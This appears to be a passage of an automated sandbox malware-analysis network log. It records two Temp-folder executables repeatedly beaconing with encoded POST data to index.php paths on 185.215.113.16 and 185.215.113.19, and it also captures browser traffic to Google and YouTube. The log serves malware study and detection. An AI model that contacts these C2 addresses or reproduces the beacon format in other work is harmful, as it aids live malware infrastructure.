Jul 26, 2024 17:58:24.837658882 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 33 42 39 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB22F73B95C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 17:58:25.673844099 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:58:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
136	192.168.2.5	55774	185.215.113.16	80	3924	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:58:25.226248026 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 17:58:26.037590027 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:58:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
137	192.168.2.5	55777	185.215.113.19	80	3652	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:58:25.794972897 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 17:58:26.623327017 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:58:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
138	192.168.2.5	55779	185.215.113.16	80	3924	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:58:26.051429987 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 36 34 35 43 33 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A645C3FEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 17:58:26.844753981 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:58:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
139	192.168.2.5	55783	185.215.113.19	80	3652	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:58:26.635319948 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 33 42 39 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB22F73B95C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 17:58:27.403146029 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:58:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
140	192.168.2.5	55785	185.215.113.16	80	3924	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:58:26.959305048 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 17:58:27.727328062 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:58:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 17:58:27.747664928 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 36 34 35 43 33 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A645C3FEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 17:58:28.016599894 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:58:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
141	192.168.2.5	55788	185.215.113.19	80	3652	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:58:27.523544073 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 17:58:28.272248030 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:58:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 17:58:28.276804924 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 33 42 39 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB22F73B95C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 17:58:28.524741888 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:58:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
142	192.168.2.5	55793	185.215.113.16	80	3924	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:58:28.133256912 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 17:58:28.889364004 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:58:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
143	192.168.2.5	55795	185.215.113.19	80	3652	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:58:28.657044888 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 17:58:29.418467999 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:58:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
144	192.168.2.5	55796	185.215.113.16	80	3924	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:58:28.901329994 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 36 34 35 43 33 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A645C3FEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 17:58:30.013673067 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:58:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0
Jul 26, 2024 17:58:30.013705015 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:58:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
145	192.168.2.5	55799	185.215.113.19	80	3652	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:58:29.484277964 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 33 42 39 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB22F73B95C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 17:58:30.253580093 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:58:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
146	192.168.2.5	55801	185.215.113.16	80	3924	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:58:30.138535023 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 17:58:30.902256966 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:58:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
147	192.168.2.5	55802	185.215.113.19	80	3652	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:58:30.374268055 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 17:58:31.149905920 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:58:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 17:58:31.154526949 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 33 42 39 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB22F73B95C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 17:58:31.433408022 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:58:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
148	192.168.2.5	55805	185.215.113.16	80	3924	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:58:30.912055969 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 36 34 35 43 33 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A645C3FEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 17:58:31.747869015 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:58:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
149	192.168.2.5	55809	185.215.113.19	80	3652	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:58:31.657835007 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 17:58:32.425100088 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:58:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	61190	172.217.23.110	443	7084	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 15:57:12 UTC	810	OUT	GET /account HTTP/1.1 Host: www.youtube.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc= Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-07-26 15:57:13 UTC	2470	IN	HTTP/1.1 303 See Other Content-Type: application/binary X-Content-Type-Options: nosniff Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Fri, 26 Jul 2024 15:57:13 GMT Location: https://accounts.google.com/ServiceLogin?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en Strict-Transport-Security: max-age=31536000 X-Frame-Options: SAMEORIGIN Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="youtube_main" Origin-Trial: AmhMBR6zCLzDDxpW+HfpP67BqwIknWnyMOXOQGfzYswFmJe+fgaI6XZgAzcxOrzNtP7hEDsOo1jdjFnVr2IdxQ4AAAB4eyJvcmlnaW4iOiJodHRwczovL3lvdXR1YmUuY29tOjQ0MyIsImZlYXR1cmUiOiJXZWJWaWV3WFJlcXVlc3RlZFdpdGhEZXByZWNhdGlvbiIsImV4cGlyeSI6MTc1ODA2NzE5OSwiaXNTdWJkb21haW4iOnRydWV9 Report-To: {"group":"youtube_main","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/youtube_main"}]} Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Vary: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* P3P: CP="This is not a P3P policy! See http://support.google.com/accounts/answer/151657?hl=en for more info." Server: ESF Content-Length: 0 X-XSS-Protection: 0 Set-Cookie: GPS=1; Domain=.youtube.com; Expires=Fri, 26-Jul-2024 16:27:13 GMT; Path=/; Secure; HttpOnly Set-Cookie: YSC=NTBNCS7mlrE; Domain=.youtube.com; Path=/; Secure; HttpOnly; SameSite=none; Partitioned Set-Cookie: VISITOR_INFO1_LIVE=VAZlknabRAc; Domain=.youtube.com; Expires=Wed, 22-Jan-2025 15:57:13 GMT; Path=/; Secure; HttpOnly; SameSite=none; Partitioned Set-Cookie: VISITOR_PRIVACY_METADATA=CgJVUxIEGgAgKQ%3D%3D; Domain=.youtube.com; Expires=Wed, 22-Jan-2025 15:57:13 GMT; Path=/; Secure; HttpOnly; SameSite=none; Partitioned Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	61193	142.251.168.84	443	7084	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 15:57:13 UTC	491	OUT	POST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1 Host: accounts.google.com Connection: keep-alive Content-Length: 1 Origin: https://www.google.com Content-Type: application/x-www-form-urlencoded Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-07-26 15:57:13 UTC	1	OUT	Data Raw: 20 Data Ascii:
2024-07-26 15:57:13 UTC	1884	IN	HTTP/1.1 200 OK Content-Type: application/json; charset=utf-8 Access-Control-Allow-Origin: https://www.google.com Access-Control-Allow-Credentials: true X-Content-Type-Options: nosniff Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Fri, 26 Jul 2024 15:57:13 GMT Strict-Transport-Security: max-age=31536000; includeSubDomains Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/IdentityListAccountsHttp/cspreport Content-Security-Policy: script-src 'report-sample' 'nonce-FAFd167l5FBlQzyPhUnTcg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/IdentityListAccountsHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/IdentityListAccountsHttp/cspreport/allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin reporting-endpoints: default="/_/IdentityListAccountsHttp/web-reports?context=eJzj0tHikmII1JBiOHxtB5Meyy0mIyA-GPec6SgQO6XPYA0C4iURF1kPJV5kFeLmuNnXv5VN4Mexa0lKukn5hfGZKal5JZkllTmZxSWJycn5pXklxcWpRWWpRfFGBkYmBuZGhnoGFvEFBgDmYiZ1" Server: ESF X-XSS-Protection: 0 